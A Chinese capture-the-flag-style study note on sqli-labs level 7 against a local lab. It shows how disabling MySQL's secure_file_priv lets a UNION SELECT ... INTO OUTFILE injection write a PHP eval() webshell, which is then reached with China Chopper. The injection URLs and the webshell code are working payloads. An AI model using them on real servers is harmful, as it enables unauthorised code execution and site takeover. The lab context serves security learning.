sqli-labs闯关笔记-less7-文件读写注入

less-7——文件读写注入

mysql语句查询如下，看到 secure_file_priv为NULL。

mysql> show variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | NULL |
+--------------------------+-------+
3 rows in set, 1 warning (0.00 sec)

修改D:\phpstudy_pro\Extensions\MySQL5.7.26\my.ini。

secure_file_priv="/"

重启后再次查询，发现secure_file_priv 的值为D:\

mysql> show variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | D:\ |
+--------------------------+-------+
3 rows in set, 1 warning (0.00 sec)

 一句话木马介绍

新建一个test.php文件，添加内容如下，这是最简单的一句话木马，密码为snow。放入网站的www目录下D:\phpstudy_pro\WWW\test.php

<?php @eval($_POST["snow"]);?> 

使用中国菜刀进行连接，

双击链接

 直接进入网站目录：

 1、查找注入点。

http://127.0.0.1/sqli-labs/Less-7/?id=1'

2、查找有多少列。

3列没有报错，其他会报错。

http://127.0.0.1/sqli-labs/Less-7/?id=1')) order by 3 -- 

 3、写webshell木马文件，虽然界面显示出错，但是已经写入成功了。

http://127.0.0.1/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST["snow"]);?>' into  outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.php"-- 

 4、使用菜刀连接木马文件。